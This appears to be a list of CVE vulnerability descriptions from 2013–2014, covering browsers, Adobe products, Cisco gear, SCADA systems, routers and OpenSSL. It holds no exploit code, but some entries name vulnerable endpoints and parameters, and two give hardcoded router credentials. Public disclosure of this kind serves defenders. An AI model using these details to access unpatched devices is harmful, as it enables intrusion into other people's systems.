CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21, HP 3COM routers and switches, and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

